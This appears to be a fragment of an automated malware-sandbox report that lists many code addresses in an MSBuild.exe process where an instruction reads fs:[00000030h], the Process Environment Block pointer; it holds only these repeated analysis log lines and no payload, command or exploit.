Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B92A6 mov eax, dword ptr fs:[00000030h]	10_2_010B92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B92A6 mov eax, dword ptr fs:[00000030h]	10_2_010B92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FED34C mov eax, dword ptr fs:[00000030h]	10_2_00FED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FED34C mov eax, dword ptr fs:[00000030h]	10_2_00FED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010792BC mov eax, dword ptr fs:[00000030h]	10_2_010792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010792BC mov eax, dword ptr fs:[00000030h]	10_2_010792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010792BC mov ecx, dword ptr fs:[00000030h]	10_2_010792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010792BC mov ecx, dword ptr fs:[00000030h]	10_2_010792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE7330 mov eax, dword ptr fs:[00000030h]	10_2_00FE7330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F2D0 mov eax, dword ptr fs:[00000030h]	10_2_0101F2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F2D0 mov eax, dword ptr fs:[00000030h]	10_2_0101F2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010002E1 mov eax, dword ptr fs:[00000030h]	10_2_010002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010002E1 mov eax, dword ptr fs:[00000030h]	10_2_010002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010002E1 mov eax, dword ptr fs:[00000030h]	10_2_010002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h]	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEC310 mov ecx, dword ptr fs:[00000030h]	10_2_00FEC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C52E2 mov eax, dword ptr fs:[00000030h]	10_2_010C52E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AF2F8 mov eax, dword ptr fs:[00000030h]	10_2_010AF2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01027505 mov eax, dword ptr fs:[00000030h]	10_2_01027505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01027505 mov ecx, dword ptr fs:[00000030h]	10_2_01027505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01086500 mov eax, dword ptr fs:[00000030h]	10_2_01086500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h]	10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h]	10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h]	10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h]	10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h]	10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h]	10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h]	10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF04E5 mov ecx, dword ptr fs:[00000030h]	10_2_00FF04E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AB52F mov eax, dword ptr fs:[00000030h]	10_2_010AB52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h]	10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h]	10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h]	10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h]	10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h]	10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h]	10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h]	10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102D530 mov eax, dword ptr fs:[00000030h]	10_2_0102D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102D530 mov eax, dword ptr fs:[00000030h]	10_2_0102D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h]	10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h]	10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h]	10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h]	10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h]	10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h]	10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C5537 mov eax, dword ptr fs:[00000030h]	10_2_010C5537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E53E mov eax, dword ptr fs:[00000030h]	10_2_0101E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E53E mov eax, dword ptr fs:[00000030h]	10_2_0101E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E53E mov eax, dword ptr fs:[00000030h]	10_2_0101E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E53E mov eax, dword ptr fs:[00000030h]	10_2_0101E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E53E mov eax, dword ptr fs:[00000030h]	10_2_0101E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF64AB mov eax, dword ptr fs:[00000030h]	10_2_00FF64AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102656A mov eax, dword ptr fs:[00000030h]	10_2_0102656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102656A mov eax, dword ptr fs:[00000030h]	10_2_0102656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102656A mov eax, dword ptr fs:[00000030h]	10_2_0102656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102B570 mov eax, dword ptr fs:[00000030h]	10_2_0102B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102B570 mov eax, dword ptr fs:[00000030h]	10_2_0102B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF9486 mov eax, dword ptr fs:[00000030h]	10_2_00FF9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF9486 mov eax, dword ptr fs:[00000030h]	10_2_00FF9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEB480 mov eax, dword ptr fs:[00000030h]	10_2_00FEB480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01024588 mov eax, dword ptr fs:[00000030h]	10_2_01024588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107B594 mov eax, dword ptr fs:[00000030h]	10_2_0107B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107B594 mov eax, dword ptr fs:[00000030h]	10_2_0107B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E59C mov eax, dword ptr fs:[00000030h]	10_2_0102E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF1460 mov eax, dword ptr fs:[00000030h]	10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF1460 mov eax, dword ptr fs:[00000030h]	10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF1460 mov eax, dword ptr fs:[00000030h]	10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF1460 mov eax, dword ptr fs:[00000030h]	10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF1460 mov eax, dword ptr fs:[00000030h]	10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010705A7 mov eax, dword ptr fs:[00000030h]	10_2_010705A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010705A7 mov eax, dword ptr fs:[00000030h]	10_2_010705A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010705A7 mov eax, dword ptr fs:[00000030h]	10_2_010705A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE645D mov eax, dword ptr fs:[00000030h]	10_2_00FE645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010115A9 mov eax, dword ptr fs:[00000030h]	10_2_010115A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010115A9 mov eax, dword ptr fs:[00000030h]	10_2_010115A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010115A9 mov eax, dword ptr fs:[00000030h]	10_2_010115A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010115A9 mov eax, dword ptr fs:[00000030h]	10_2_010115A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010115A9 mov eax, dword ptr fs:[00000030h]	10_2_010115A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010145B1 mov eax, dword ptr fs:[00000030h]	10_2_010145B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010145B1 mov eax, dword ptr fs:[00000030h]	10_2_010145B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h]	10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h]	10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h]	10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h]	10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h]	10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h]	10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h]	10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h]	10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h]	10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010835BA mov eax, dword ptr fs:[00000030h]	10_2_010835BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010835BA mov eax, dword ptr fs:[00000030h]	10_2_010835BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010835BA mov eax, dword ptr fs:[00000030h]	10_2_010835BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010835BA mov eax, dword ptr fs:[00000030h]	10_2_010835BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AF5BE mov eax, dword ptr fs:[00000030h]	10_2_010AF5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0108D5B0 mov eax, dword ptr fs:[00000030h]	10_2_0108D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0108D5B0 mov eax, dword ptr fs:[00000030h]	10_2_0108D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h]	10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h]	10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h]	10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h]	10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h]	10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h]	10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010255C0 mov eax, dword ptr fs:[00000030h]	10_2_010255C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C55C9 mov eax, dword ptr fs:[00000030h]	10_2_010C55C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E5CF mov eax, dword ptr fs:[00000030h]	10_2_0102E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E5CF mov eax, dword ptr fs:[00000030h]	10_2_0102E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102A5D0 mov eax, dword ptr fs:[00000030h]	10_2_0102A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102A5D0 mov eax, dword ptr fs:[00000030h]	10_2_0102A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0106D5D0 mov eax, dword ptr fs:[00000030h]	10_2_0106D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0106D5D0 mov ecx, dword ptr fs:[00000030h]	10_2_0106D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEC427 mov eax, dword ptr fs:[00000030h]	10_2_00FEC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C35D7 mov eax, dword ptr fs:[00000030h]	10_2_010C35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C35D7 mov eax, dword ptr fs:[00000030h]	10_2_010C35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C35D7 mov eax, dword ptr fs:[00000030h]	10_2_010C35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010195DA mov eax, dword ptr fs:[00000030h]	10_2_010195DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEE420 mov eax, dword ptr fs:[00000030h]	10_2_00FEE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEE420 mov eax, dword ptr fs:[00000030h]	10_2_00FEE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEE420 mov eax, dword ptr fs:[00000030h]	10_2_00FEE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102C5ED mov eax, dword ptr fs:[00000030h]	10_2_0102C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102C5ED mov eax, dword ptr fs:[00000030h]	10_2_0102C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h]	10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h]	10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h]	10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h]	10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h]	10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h]	10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01028402 mov eax, dword ptr fs:[00000030h]	10_2_01028402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01028402 mov eax, dword ptr fs:[00000030h]	10_2_01028402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01028402 mov eax, dword ptr fs:[00000030h]	10_2_01028402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101340D mov eax, dword ptr fs:[00000030h]	10_2_0101340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01077410 mov eax, dword ptr fs:[00000030h]	10_2_01077410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF25E0 mov eax, dword ptr fs:[00000030h]	10_2_00FF25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h]	10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h]	10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h]	10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h]	10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h]	10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h]	10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h]	10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF65D0 mov eax, dword ptr fs:[00000030h]	10_2_00FF65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102A430 mov eax, dword ptr fs:[00000030h]	10_2_0102A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h]	10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h]	10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h]	10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h]	10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h]	10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h]	10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h]	10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h]	10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AF453 mov eax, dword ptr fs:[00000030h]	10_2_010AF453
